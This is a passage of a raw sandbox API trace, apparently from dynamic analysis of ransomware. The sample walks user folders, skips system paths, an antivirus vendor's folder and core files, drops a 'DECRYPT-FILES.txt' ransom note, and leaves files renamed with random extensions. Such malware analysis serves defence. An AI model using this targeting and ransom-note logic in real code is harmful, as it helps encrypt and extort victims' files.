(in: lpString1=0x36fea5c, lpString2="C:\\Users\\Default\\Favorites\\MSN Websites\\" | out: lpString1="C:\\Users\\Default\\Favorites\\MSN Websites\\") returned="C:\\Users\\Default\\Favorites\\MSN Websites\\" [0186.642] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites\\MSN Websites\\", lpString2="MSNBC News.url.p82hb" | out: lpString1="C:\\Users\\Default\\Favorites\\MSN Websites\\MSNBC News.url.p82hb") returned="C:\\Users\\Default\\Favorites\\MSN Websites\\MSNBC News.url.p82hb" [0186.642] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.642] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\MSNBC News.url.p82hb" (normalized: "c:\\users\\default\\favorites\\msn websites\\msnbc news.url.p82hb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.642] CloseHandle (hObject=0x0) returned 0 [0186.642] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.642] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xb0e6bbe0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x18d, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSNBC News.url.p82hb", cAlternateFileName="MSNBCN~1.P82")) returned 0 [0186.642] FindClose (in: hFindFile=0x4798b8 | out: hFindFile=0x4798b8) returned 1 [0186.643] CloseHandle (hObject=0xffffffff) returned 0 [0186.643] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0e91d40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0e91d40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 1 [0186.643] lstrcmpW (lpString1="Windows Live", lpString2=".") returned 1 [0186.643] lstrcmpW (lpString1="Windows Live", lpString2="..") returned 1 [0186.643] lstrcatW (in: lpString1="Windows Live", lpString2="\\" | out: lpString1="Windows Live\\") returned="Windows Live\\" [0186.643] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites\\", lpString2="Windows Live\\" | out: lpString1="C:\\Users\\Default\\Favorites\\Windows Live\\") returned="C:\\Users\\Default\\Favorites\\Windows Live\\" [0186.643] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\Windows Live\\", lpSrch="\\Program Files") returned 0x0 [0186.643] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\Windows Live\\", lpSrch=":\\Windows") returned 0x0 [0186.643] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\Windows Live\\", lpSrch="\\Games\\") returned 0x0 [0186.643] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\Windows Live\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.643] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\Windows Live\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.643] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\Windows Live\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.643] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\Windows Live\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.643] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\Windows Live\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.643] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\Windows Live\\", lpSrch="\\All Users") returned 0x0 [0186.643] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\Windows Live\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.643] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\Windows Live\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.643] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\Windows Live\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.643] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\Windows Live\\", lpSrch="AhnLab") returned 0x0 [0186.643] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\Windows Live\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.643] lstrlenW (lpString="C:\\Users\\Default\\Favorites\\Windows Live\\") returned 40 [0186.643] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.643] wsprintfW (in: param_1=0x36fea6c, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\Favorites\\Windows Live\\\\0a16c9.tmp") returned 51 [0186.643] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\Windows Live\\\\0a16c9.tmp" (normalized: "c:\\users\\default\\favorites\\windows live\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0186.650] GetLastError () returned 0x5 [0186.650] lstrlenW (lpString="C:\\Users\\Default\\Favorites\\Windows Live\\") returned 40 [0186.650] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.650] wsprintfW (in: param_1=0x36fea6c, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\Favorites\\Windows Live\\\\DECRYPT-FILES.txt") returned 58 [0186.650] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\Windows Live\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\favorites\\windows live\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.651] lstrlenW (lpString="C:\\Users\\Default\\Favorites\\Windows Live\\") returned 40 [0186.651] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites\\Windows Live\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\Favorites\\Windows Live\\*") returned="C:\\Users\\Default\\Favorites\\Windows Live\\*" [0186.651] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Favorites\\Windows Live\\*", lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0e91d40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0e91d40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4798b8 [0186.652] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0186.652] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0e91d40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0e91d40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0186.652] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0186.652] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0186.652] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0e6bbe0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0e6bbe0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0e6bbe0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0186.652] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0186.652] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xb0e6bbe0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x18d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Get Windows Live.url.p82hb", cAlternateFileName="GETWIN~1.P82")) returned 1 [0186.652] lstrcmpiW (lpString1="Get Windows Live.url.p82hb", lpString2="DECRYPT-FILES.txt") returned 1 [0186.652] lstrcmpiW (lpString1="Get Windows Live.url.p82hb", lpString2="autorun.inf") returned 1 [0186.652] lstrcmpiW (lpString1="Get Windows Live.url.p82hb", lpString2="boot.ini") returned 1 [0186.652] lstrcmpiW (lpString1="Get Windows Live.url.p82hb", lpString2="desktop.ini") returned 1 [0186.652] lstrcmpiW (lpString1="Get Windows Live.url.p82hb", lpString2="ntuser.dat") returned -1 [0186.652] lstrcmpiW (lpString1="Get Windows Live.url.p82hb", lpString2="iconcache.db") returned -1 [0186.652] lstrcmpiW (lpString1="Get Windows Live.url.p82hb", lpString2="bootsect.bak") returned 1 [0186.652] lstrcmpiW (lpString1="Get Windows Live.url.p82hb", lpString2="ntuser.dat.log") returned -1 [0186.652] lstrcmpiW (lpString1="Get Windows Live.url.p82hb", lpString2="thumbs.db") returned -1 [0186.652] lstrcmpiW (lpString1="Get Windows Live.url.p82hb", lpString2="Bootfont.bin") returned 1 [0186.652] lstrlenW (lpString="Get Windows Live.url.p82hb") returned 26 [0186.652] lstrcmpiW (lpString1="p82hb", lpString2="lnk") returned 1 [0186.652] lstrcmpiW (lpString1="p82hb", lpString2="exe") returned 1 [0186.653] lstrcmpiW (lpString1="p82hb", lpString2="sys") returned -1 [0186.653] lstrcmpiW (lpString1="p82hb", lpString2="dll") returned 1 [0186.653] lstrlenW (lpString="C:\\Users\\Default\\Favorites\\Windows Live\\") returned 40 [0186.653] lstrlenW (lpString="Get Windows Live.url.p82hb") returned 26 [0186.653] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\Default\\Favorites\\Windows Live\\" | out: lpString1="C:\\Users\\Default\\Favorites\\Windows Live\\") returned="C:\\Users\\Default\\Favorites\\Windows Live\\" [0186.653] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites\\Windows Live\\", lpString2="Get Windows Live.url.p82hb" | out: lpString1="C:\\Users\\Default\\Favorites\\Windows Live\\Get Windows Live.url.p82hb") returned="C:\\Users\\Default\\Favorites\\Windows Live\\Get Windows Live.url.p82hb" [0186.653] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.653] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\Windows Live\\Get Windows Live.url.p82hb" (normalized: "c:\\users\\default\\favorites\\windows live\\get windows live.url.p82hb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.653] CloseHandle (hObject=0x0) returned 0 [0186.653] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.653] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xb0e6bbe0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x18d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Live Gallery.url.p82hb", cAlternateFileName="WINDOW~1.P82")) returned 1 [0186.653] lstrcmpiW (lpString1="Windows Live Gallery.url.p82hb", lpString2="DECRYPT-FILES.txt") returned 1 [0186.653] lstrcmpiW (lpString1="Windows Live Gallery.url.p82hb", lpString2="autorun.inf") returned 1 [0186.653] lstrcmpiW (lpString1="Windows Live Gallery.url.p82hb", lpString2="boot.ini") returned 1 [0186.653] lstrcmpiW (lpString1="Windows Live Gallery.url.p82hb", lpString2="desktop.ini") returned 1 [0186.653] lstrcmpiW (lpString1="Windows Live Gallery.url.p82hb", lpString2="ntuser.dat") returned 1 [0186.653] lstrcmpiW (lpString1="Windows Live Gallery.url.p82hb", lpString2="iconcache.db") returned 1 [0186.653] lstrcmpiW (lpString1="Windows Live Gallery.url.p82hb", lpString2="bootsect.bak") returned 1 [0186.653] lstrcmpiW (lpString1="Windows Live Gallery.url.p82hb", lpString2="ntuser.dat.log") returned 1 [0186.653] lstrcmpiW (lpString1="Windows Live Gallery.url.p82hb", lpString2="thumbs.db") returned 1 [0186.654] lstrcmpiW (lpString1="Windows Live Gallery.url.p82hb", lpString2="Bootfont.bin") returned 1 [0186.654] lstrlenW (lpString="Windows Live Gallery.url.p82hb") returned 30 [0186.654] lstrcmpiW (lpString1="p82hb", lpString2="lnk") returned 1 [0186.654] lstrcmpiW (lpString1="p82hb", lpString2="exe") returned 1 [0186.654] lstrcmpiW (lpString1="p82hb", lpString2="sys") returned -1 [0186.654] lstrcmpiW (lpString1="p82hb", lpString2="dll") returned 1 [0186.654] lstrlenW (lpString="C:\\Users\\Default\\Favorites\\Windows Live\\") returned 40 [0186.654] lstrlenW (lpString="Windows Live Gallery.url.p82hb") returned 30 [0186.654] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\Default\\Favorites\\Windows Live\\" | out: lpString1="C:\\Users\\Default\\Favorites\\Windows Live\\") returned="C:\\Users\\Default\\Favorites\\Windows Live\\" [0186.654] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites\\Windows Live\\", lpString2="Windows Live Gallery.url.p82hb" | out: lpString1="C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Gallery.url.p82hb") returned="C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Gallery.url.p82hb" [0186.654] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.654] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Gallery.url.p82hb" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live gallery.url.p82hb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.654] CloseHandle (hObject=0x0) returned 0 [0186.654] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.654] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xb0e91d40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x18d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Live Mail.url.c7OYK", cAlternateFileName="WINDOW~1.C7O")) returned 1 [0186.654] lstrcmpiW (lpString1="Windows Live Mail.url.c7OYK", lpString2="DECRYPT-FILES.txt") returned 1 [0186.654] lstrcmpiW (lpString1="Windows Live Mail.url.c7OYK", lpString2="autorun.inf") returned 1 [0186.654] lstrcmpiW (lpString1="Windows Live Mail.url.c7OYK", lpString2="boot.ini") returned 1 [0186.654] lstrcmpiW (lpString1="Windows Live Mail.url.c7OYK", lpString2="desktop.ini") returned 1 [0186.654] lstrcmpiW (lpString1="Windows Live Mail.url.c7OYK", lpString2="ntuser.dat") returned 1 [0186.654] lstrcmpiW (lpString1="Windows Live Mail.url.c7OYK", lpString2="iconcache.db") returned 1 [0186.655] lstrcmpiW (lpString1="Windows Live Mail.url.c7OYK", lpString2="bootsect.bak") returned 1 [0186.655] lstrcmpiW (lpString1="Windows Live Mail.url.c7OYK", lpString2="ntuser.dat.log") returned 1 [0186.655] lstrcmpiW (lpString1="Windows Live Mail.url.c7OYK", lpString2="thumbs.db") returned 1 [0186.655] lstrcmpiW (lpString1="Windows Live Mail.url.c7OYK", lpString2="Bootfont.bin") returned 1 [0186.655] lstrlenW (lpString="Windows Live Mail.url.c7OYK") returned 27 [0186.655] lstrcmpiW (lpString1="c7OYK", lpString2="lnk") returned -1 [0186.655] lstrcmpiW (lpString1="c7OYK", lpString2="exe") returned -1 [0186.655] lstrcmpiW (lpString1="c7OYK", lpString2="sys") returned -1 [0186.655] lstrcmpiW (lpString1="c7OYK", lpString2="dll") returned -1 [0186.655] lstrlenW (lpString="C:\\Users\\Default\\Favorites\\Windows Live\\") returned 40 [0186.655] lstrlenW (lpString="Windows Live Mail.url.c7OYK") returned 27 [0186.655] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\Default\\Favorites\\Windows Live\\" | out: lpString1="C:\\Users\\Default\\Favorites\\Windows Live\\") returned="C:\\Users\\Default\\Favorites\\Windows Live\\" [0186.655] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites\\Windows Live\\", lpString2="Windows Live Mail.url.c7OYK" | out: lpString1="C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Mail.url.c7OYK") returned="C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Mail.url.c7OYK" [0186.655] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.655] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Mail.url.c7OYK" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live mail.url.c7oyk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.655] CloseHandle (hObject=0x0) returned 0 [0186.655] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.655] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xb0e91d40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x18d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Live Spaces.url.c7OYK", cAlternateFileName="WINDOW~2.C7O")) returned 1 [0186.655] lstrcmpiW (lpString1="Windows Live Spaces.url.c7OYK", lpString2="DECRYPT-FILES.txt") returned 1 [0186.655] lstrcmpiW (lpString1="Windows Live Spaces.url.c7OYK", lpString2="autorun.inf") returned 1 [0186.655] lstrcmpiW (lpString1="Windows Live Spaces.url.c7OYK", lpString2="boot.ini") returned 1 [0186.655] lstrcmpiW (lpString1="Windows Live Spaces.url.c7OYK", lpString2="desktop.ini") returned 1 [0186.656] lstrcmpiW (lpString1="Windows Live Spaces.url.c7OYK", lpString2="ntuser.dat") returned 1 [0186.656] lstrcmpiW (lpString1="Windows Live Spaces.url.c7OYK", lpString2="iconcache.db") returned 1 [0186.656] lstrcmpiW (lpString1="Windows Live Spaces.url.c7OYK", lpString2="bootsect.bak") returned 1 [0186.656] lstrcmpiW (lpString1="Windows Live Spaces.url.c7OYK", lpString2="ntuser.dat.log") returned 1 [0186.656] lstrcmpiW (lpString1="Windows Live Spaces.url.c7OYK", lpString2="thumbs.db") returned 1 [0186.656] lstrcmpiW (lpString1="Windows Live Spaces.url.c7OYK", lpString2="Bootfont.bin") returned 1 [0186.656] lstrlenW (lpString="Windows Live Spaces.url.c7OYK") returned 29 [0186.656] lstrcmpiW (lpString1="c7OYK", lpString2="lnk") returned -1 [0186.656] lstrcmpiW (lpString1="c7OYK", lpString2="exe") returned -1 [0186.656] lstrcmpiW (lpString1="c7OYK", lpString2="sys") returned -1 [0186.656] lstrcmpiW (lpString1="c7OYK", lpString2="dll") returned -1 [0186.656] lstrlenW (lpString="C:\\Users\\Default\\Favorites\\Windows Live\\") returned 40 [0186.656] lstrlenW (lpString="Windows Live Spaces.url.c7OYK") returned 29 [0186.656] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\Default\\Favorites\\Windows Live\\" | out: lpString1="C:\\Users\\Default\\Favorites\\Windows Live\\") returned="C:\\Users\\Default\\Favorites\\Windows Live\\" [0186.656] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites\\Windows Live\\", lpString2="Windows Live Spaces.url.c7OYK" | out: lpString1="C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Spaces.url.c7OYK") returned="C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Spaces.url.c7OYK" [0186.656] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.656] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Spaces.url.c7OYK" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live spaces.url.c7oyk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.656] CloseHandle (hObject=0x0) returned 0 [0186.656] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.656] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xb0e91d40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x18d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Live Spaces.url.c7OYK", cAlternateFileName="WINDOW~2.C7O")) returned 0 [0186.656] FindClose (in: hFindFile=0x4798b8 | out: hFindFile=0x4798b8) returned 1 [0186.657] CloseHandle (hObject=0xffffffff) returned 0 [0186.657] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0e91d40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0e91d40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live\\", cAlternateFileName="WINDOW~1")) returned 0 [0186.657] FindClose (in: hFindFile=0x479878 | out: hFindFile=0x479878) returned 1 [0186.657] CloseHandle (hObject=0xffffffff) returned 0 [0186.657] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0e91d40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0e91d40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0186.657] lstrcmpW (lpString1="Links", lpString2=".") returned 1 [0186.657] lstrcmpW (lpString1="Links", lpString2="..") returned 1 [0186.657] lstrcatW (in: lpString1="Links", lpString2="\\" | out: lpString1="Links\\") returned="Links\\" [0186.657] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Links\\" | out: lpString1="C:\\Users\\Default\\Links\\") returned="C:\\Users\\Default\\Links\\" [0186.657] StrStrW (lpFirst="C:\\Users\\Default\\Links\\", lpSrch="\\Program Files") returned 0x0 [0186.657] StrStrW (lpFirst="C:\\Users\\Default\\Links\\", lpSrch=":\\Windows") returned 0x0 [0186.657] StrStrW (lpFirst="C:\\Users\\Default\\Links\\", lpSrch="\\Games\\") returned 0x0 [0186.657] StrStrW (lpFirst="C:\\Users\\Default\\Links\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.658] StrStrW (lpFirst="C:\\Users\\Default\\Links\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.658] StrStrW (lpFirst="C:\\Users\\Default\\Links\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.658] StrStrW (lpFirst="C:\\Users\\Default\\Links\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.658] StrStrW (lpFirst="C:\\Users\\Default\\Links\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.658] StrStrW (lpFirst="C:\\Users\\Default\\Links\\", lpSrch="\\All Users") returned 0x0 [0186.658] StrStrW (lpFirst="C:\\Users\\Default\\Links\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.658] StrStrW (lpFirst="C:\\Users\\Default\\Links\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.658] StrStrW (lpFirst="C:\\Users\\Default\\Links\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.658] StrStrW (lpFirst="C:\\Users\\Default\\Links\\", lpSrch="AhnLab") returned 0x0 [0186.658] StrStrW (lpFirst="C:\\Users\\Default\\Links\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.658] lstrlenW (lpString="C:\\Users\\Default\\Links\\") returned 23 [0186.658] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.658] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\Links\\\\0a16c9.tmp") returned 34 [0186.658] CreateFileW (lpFileName="C:\\Users\\Default\\Links\\\\0a16c9.tmp" (normalized: "c:\\users\\default\\links\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0186.664] GetLastError () returned 0x5 [0186.664] lstrlenW (lpString="C:\\Users\\Default\\Links\\") returned 23 [0186.664] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.664] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\Links\\\\DECRYPT-FILES.txt") returned 41 [0186.664] CreateFileW (lpFileName="C:\\Users\\Default\\Links\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\links\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.665] lstrlenW (lpString="C:\\Users\\Default\\Links\\") returned 23 [0186.666] lstrcatW (in: lpString1="C:\\Users\\Default\\Links\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\Links\\*") returned="C:\\Users\\Default\\Links\\*" [0186.666] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Links\\*", lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0e91d40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0e91d40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, 